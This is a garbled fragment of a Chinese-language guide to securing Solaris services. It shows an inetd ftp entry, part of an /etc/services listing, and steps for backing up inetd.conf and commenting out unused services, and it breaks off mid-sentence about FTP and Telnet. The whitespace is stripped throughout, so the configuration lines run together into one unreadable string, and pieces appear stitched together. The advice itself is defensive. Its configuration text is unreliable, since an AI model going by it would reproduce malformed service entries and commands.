in.ftpd-a#ftp服務器/etc/servicesMore/etc/services#Networkservices,Internetstyle#tcpmux1/tcpecho7/tcpecho7/udpdiscard9/tcpsinknulldiscard9/udpsinknullsystat11/tcpusersdaytime13/tcpdaytime13/udpnetstat15/tcpSolaris系統服務安全在inetd.conf中關閉不用的服務

#cp/etc/inet/inetd.conf/etc/inet/inetd.conf.bak然后用vi編輯器編輯inetd.conf文件，對于需要注釋掉的服務在相應行開頭標記“#”字符即可。注:Ftp和Telnet服務在不需要時也